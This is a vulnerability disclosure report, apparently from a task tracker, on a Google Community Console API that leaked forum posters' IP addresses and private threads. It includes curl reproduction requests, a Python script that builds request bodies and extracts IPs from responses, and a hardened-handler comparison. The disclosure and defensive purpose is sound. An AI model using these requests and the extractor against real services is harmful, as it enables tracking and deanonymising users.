
IP address of the original poster in a forum thread revealed by API in the Google Forums Community Console
Verified, Public

Description

This is a bug I reported to Google via Google's Vulnerability Rewards Program on Mar 22, 2019.

Below is an intact reproduction of the report sent to Google (I formatted several parts so they are better looking here, I could only send plain text to Google, and I censored some parts):

Description

This is a vulnerability report about a product (the Community Console: https://support.google.com/communities/answer/9026531?hl=en) that is only available to Product Experts (volunteers outside Google who answer questions in the Google Forums and are recognised by Google: https://productexperts.withgoogle.com/) and some Googlers. Therefore, before being able to reproduce the problem, you may have to request authorization to access the Community Console.

Steps to reproduce:

  1. If the API has not changed its behaviour, run the following curl command, which will make a request to the API and get the data of a forum thread (there's no need to send any cookies for it to succeed):
curl 'https://support.google.com/s/community/api/ViewThread?authuser=0' \
  -H 'origin: https://support.google.com' \
  -H 'accept-encoding: gzip, deflate, br' \
  -H 'accept-language: en-US,en;q=0.9,es;q=0.8,ca;q=0.7,fr;q=0.6' \
  -H 'user-agent: Mozilla/5.0 (X11; CrOS x86_64 11316.165.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.122 Safari/537.36' \
  -H 'content-type: text/plain; charset=utf-8' \
  -H 'accept: */*' \
  -H 'referer: https://support.google.com/s/community/forum/697265/thread/2517326' \
  -H 'authority: support.google.com' \
  --data-binary '{"1":"697265","2":"2517326","3":{"1":{"2":0},"2":{"1":1},"3":true,"5":true,"10":true,"16":true}}' \
  --compressed
  2. In that obfuscated JSON response, you'll be able to see "83.37.193.225" somewhere in there, the IP address with which I posted the first message of the thread.

If the previous API request didn't work well because the API changed its behaviour, these are the steps to follow:

  1. Open a Chrome tab and open the "Network" tab in the Developer Tools.
  2. Browse to https://support.google.com/s/community/forum/697265/thread/2517326 (again, if you don't have permission to access this page you may be redirected to https://support.google.com).
  3. In the network tab, search for a request called "ViewThread" (https://support.google.com/s/community/api/ViewThread). The response from the server for that request is the data corresponding to the thread being opened.
  4. You'll be able to see my IP address in there, as I explained before.
  5. If you replay the request shown in Chrome by copying it as curl and removing all the (authentication) cookies, you'll still receive a response with the thread data. So, technically, if some user outside the Product Experts circle knows of the API endpoint and how it works, they will be able to obtain the IP addresses; that's why I shared the curl request with you in the first place, because it is easier to reproduce it that way.

Browser/OS: Chrome OS 72.0.3626.122

Attack scenario

Any of the [REDACTED] Product Experts who have access to the Community Console can take advantage of this vulnerability easily by looking at the response that the API returns when opening a thread, and anyone who is aware of this issue and knows how the API works can exploit it. This could allow people to track the posters in the forum by their IP and also approximately geolocate them.

Although the forums are public (for example https://support.google.com/chrome/community?hl=en), the Community Console is a tool exclusive for Product Experts and Googlers to answer questions faster and better (and I could only see that the vulnerability exists in the Community Console, not on the public forums). With that being said, I would like to observe that if an attacker knew the API endpoint and how it works (maybe because some Product Expert has told them), it would be very easy to make valid requests, because all the threads are public, and this way an attacker would be able to get the ID of each thread and pass it as a parameter to the API request in order to get the IP of the original poster in each thread.

In the worst case scenario, someone could sue Google because you're revealing the IP addresses you collect against what you state in your privacy policy (https://policies.google.com/privacy?hl=en-US#infosharing), because you didn't ask the user for consent to give it to the Product Experts (who are not Google employees), and I don't think it falls under the "legal reasons" category nor the other ones.
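The reproduction steps above leave the reader to eyeball an obfuscated, numerically-keyed JSON blob for an address, and the attack scenario notes that any public thread id can be fed to the same endpoint. The following Python script is an added example for this page, not part of the report and not Google's code: it builds the exact ViewThread request body shown in the report for any forum/thread pair, and walks a decoded response to list every string leaf that parses as an IPv4 or IPv6 address, with its path in the tree. The response layout in SAMPLE_RESPONSE is constructed for illustration and is not the real API's schema, and the anti-XSSI prefix handling is an assumption (the page says nothing about such a prefix); it runs offline against the constructed sample.

```python
import ipaddress
import json

# Options object copied verbatim from the report's request body; its meaning is undocumented.
VIEW_THREAD_OPTIONS = {"1": {"2": 0}, "2": {"1": 1}, "3": True, "5": True, "10": True, "16": True}

# Assumption, not stated on the page: some JSON endpoints prefix the body with an anti-XSSI marker.
ANTI_XSSI_PREFIX = ")]}'"


def build_view_thread_body(forum_id, thread_id):
    """Serialise the ViewThread body for any forum/thread pair, in the compact form the report shows."""
    body = {"1": str(forum_id), "2": str(thread_id), "3": VIEW_THREAD_OPTIONS}
    return json.dumps(body, separators=(",", ":"))


def parse_response(raw):
    """Decode a raw response body, dropping the anti-XSSI prefix if the server sends one."""
    text = raw.lstrip()
    if text.startswith(ANTI_XSSI_PREFIX):
        text = text[len(ANTI_XSSI_PREFIX):]
    return json.loads(text)


def find_ip_addresses(node, path=""):
    """Return (json_path, address) for every string leaf that parses as an IPv4 or IPv6 address.

    Only string leaves are tested on purpose: ipaddress.ip_address(5) is a valid
    address (0.0.0.5), so testing integers would flood the output with false hits.
    """
    found = []
    if isinstance(node, dict):
        for key, value in node.items():
            found.extend(find_ip_addresses(value, f"{path}/{key}"))
    elif isinstance(node, list):
        for index, value in enumerate(node):
            found.extend(find_ip_addresses(value, f"{path}[{index}]"))
    elif isinstance(node, str):
        try:
            found.append((path, str(ipaddress.ip_address(node))))
        except ValueError:
            pass  # ordinary text, numeric ids, or version strings such as "72.0.3626.122"
    return found


# Constructed sample response: numeric keys mimic the obfuscated style, but this layout is invented.
SAMPLE_RESPONSE = {
    "1": {
        "1": {"1": "697265", "2": "2517326"},
        "2": [
            {"1": "Constructed thread title", "3": {"1": "avm99963", "4": "83.37.193.225"}, "5": 2517326},
            {"1": "Constructed reply", "3": {"1": "another user", "4": "2001:db8::1"}, "5": 2517327},
        ],
        "7": "72.0.3626.122",
    }
}


if __name__ == "__main__":
    print(build_view_thread_body("697265", "2517326"))
    decoded = parse_response(")]}'\n" + json.dumps(SAMPLE_RESPONSE))
    for json_path, address in find_ip_addresses(decoded):
        print(f"{address:>16}  at {json_path}")
```

Validating candidates with the ipaddress module rather than a regex is deliberate: it accepts IPv6 and rejects look-alikes such as browser version numbers, which a loose dotted-quad pattern would report. In a real triage the raw response would come from the curl command above and be passed through parse_response.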

Details

Vendor
Google
Product
Community Console
Reported
Mar 22 2019, 12:28 AM
Reward
5000

Event Timeline

avm99963 triaged this task as Priority-1 priority. Mar 22 2019, 12:29 AM
avm99963 created this task.

On Mar 23, 2019 2:41AM I sent Google another email detailing another vulnerability I found in the same API:

Hi!

I just discovered you can also use the API to, apart from viewing IP addresses, view private threads (which sometimes include [REDACTED]) without being logged in, if you know the id of the private thread and the forum, and of course also if you know how the API works. Just as an example to repro this, run the following (this thread doesn't contain confidential information):

curl 'https://support.google.com/s/community/api/ViewThread' \
  -H 'origin: https://support.google.com' \
  -H 'accept-encoding: gzip, deflate, br' \
  -H 'accept-language: en-US,en;q=0.9,es;q=0.8,ca;q=0.7,fr;q=0.6' \
  -H 'user-agent: Mozilla/5.0 (X11; CrOS x86_64 11316.165.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.122 Safari/537.36' \
  -H 'content-type: text/plain; charset=utf-8' \
  -H 'accept: */*' \
  -H 'referer: https://support.google.com/s/community/forum/1479660/search/query%3Dforum%253A%25281479660%2B%257C%2B1863597%2529/thread/2115714' \
  -H 'authority: support.google.com' \
  -H 'dnt: 1' \
  --data-binary '{"1":"1479660","2":"2115714","3":{"1":{"2":0},"2":{"1":1},"3":true,"5":true,"10":true,"16":true}}' \
  --compressed

This may be used by [REDACTED] to access threads in those forums, if they know the thread id and forum id. [REDACTED]

Thanks!
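Both findings on this page (the poster's IP in the thread view, and private threads served to a cookieless request) come down to one server-side pattern: the endpoint relies on the Community Console UI being gated, serialises the whole stored record, and performs no per-thread authorization of its own. The following is an added, constructed model of such a handler beside a hardened one; it is example code written for this page, not Google's implementation. The forum and thread ids are the ones quoted in the report; the data store, session shape, private flag, post contents and field names are all invented.

```python
from dataclasses import dataclass
from typing import Optional


class NotFound(Exception):
    """Thread does not exist, or the caller is not allowed to learn whether it exists."""


@dataclass(frozen=True)
class Post:
    author: str
    body: str
    poster_ip: str  # collected server-side; must never be serialised into a thread view


@dataclass(frozen=True)
class Thread:
    forum_id: str
    thread_id: str
    private: bool
    posts: tuple


@dataclass(frozen=True)
class Session:
    user: Optional[str] = None               # None models the cookieless request from the report
    private_forums: frozenset = frozenset()  # forums whose private threads this user may read


ANONYMOUS = Session()

# Constructed store: the ids match the report, the content and the private flag are invented.
THREADS = {
    ("697265", "2517326"): Thread("697265", "2517326", private=False,
                                  posts=(Post("avm99963", "Public question", "83.37.193.225"),)),
    ("1479660", "2115714"): Thread("1479660", "2115714", private=True,
                                   posts=(Post("someone", "Private question", "198.51.100.7"),)),
}


def vulnerable_view_thread(forum_id, thread_id, session=ANONYMOUS):
    """Models the behaviour the report describes: no visibility check, whole record serialised."""
    thread = THREADS.get((forum_id, thread_id))
    if thread is None:
        raise NotFound(thread_id)
    # Copying the stored object wholesale is how the poster's IP ends up in the response.
    return {"1": forum_id, "2": thread_id,
            "posts": [{"author": p.author, "body": p.body, "ip": p.poster_ip} for p in thread.posts]}


def hardened_view_thread(forum_id, thread_id, session=ANONYMOUS):
    """Object-level authorization on the thread itself, plus an explicit allow-list of response fields."""
    thread = THREADS.get((forum_id, thread_id))
    if thread is None:
        raise NotFound(thread_id)
    if thread.private and (session.user is None or forum_id not in session.private_forums):
        # Same error as a missing thread, so an unauthenticated caller cannot enumerate private ids.
        raise NotFound(thread_id)
    # Allow-list the fields the client needs; poster_ip is simply never copied out.
    return {"1": forum_id, "2": thread_id,
            "posts": [{"author": p.author, "body": p.body} for p in thread.posts]}


def is_readable(view, forum_id, thread_id, session=ANONYMOUS):
    """True if `view` serves the thread to `session`; useful for checking the access matrix."""
    try:
        view(forum_id, thread_id, session)
    except NotFound:
        return False
    return True


if __name__ == "__main__":
    print("vulnerable, anonymous, private thread:", is_readable(vulnerable_view_thread, "1479660", "2115714"))
    print("hardened,   anonymous, private thread:", is_readable(hardened_view_thread, "1479660", "2115714"))
    print("hardened response:", hardened_view_thread("697265", "2517326"))
```

Two design points carry over to real systems. The authorization decision is made against the thread being requested, not against whether the caller can reach the Console page, so removing cookies from a replayed request changes the answer. And the response is built from an allow-list of fields rather than from the stored object, so a field such as poster_ip cannot leak by default when the schema grows.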

On Mar 26, 2019 09:35PM Google acknowledged the report:

Hi,

Nice catch! I've filed a bug based on your report. The panel will evaluate it at the next VRP panel meeting and we'll update you once we've got more information. All you need to do now is wait. If you don't hear back from us in 2-3 weeks or have additional information about the vulnerability, let us know!

Regards,
[REDACTED], Google Security Team

On Apr 9, 2019 06:20PM I received a message with the panel's verdict (along with other information about the reward):

Thank you for reporting this bug. As part of Google's Vulnerability Reward Program, the panel has decided to issue a reward of $5000.00.

I have checked that the vulnerabilities have been fixed, at least as far as I know (so I'm changing this bug's status to fixed). Nevertheless, I've just contacted Google to ask whether they have really fixed it, and whether I can publish this report.

On Apr 24 2019, 8:39AM Google said:

You should receive a notification when the bug is fixed and verified by us

On Jun 3, 2019 10:47AM Google sent me this message:

It looks like the team is still working on it, but it looks like they're just about done, so I'd imagine you'll get notified of the fix fairly shortly.

avm99963 raised the priority of this task from Priority-1 to Priority-0. Jun 5 2019, 10:09 PM

On Jun 19, 2019 4:23 PM I contacted Google again in order to tell them that 89 days have elapsed since the reporting date and to inquire about whether the fix was already implemented or not.

I've changed the default 90-day deadline to 120 days because otherwise it would be automatically disclosed in a few days.

avm99963 changed the task status from Fixed to Verified. Jan 19 2020, 5:43 PM

On Jun 20, 2019 12:06 AM Google replied:

Sorry, this bug was fixed back in March, but our automation didn't send you a notification because we didn't verify it properly, but it was fixed a long time ago.

Also, on Oct 12, 2019 11:36 PM I received this automatic email:

Our systems show that all the bugs we decided to create based on your report have been fixed. Feel free to check and let us know if it looks OK on your end. Thanks for all the help!

Unfortunately, I didn't remember to publish this report after I received this final email, but both parties have verified that the issue is fixed, so I'm changing the status to verified.

I've discovered another vulnerability closely related to this one, so I'll mark this report as blocked by the other report and I'll publish this report when the other can also be published.

The blocking report has been published, so publishing this report too.

avm99963 changed the visibility from "Restricted Project (Project)" to "Public (No Login Required)". Jul 20 2020, 11:28 PM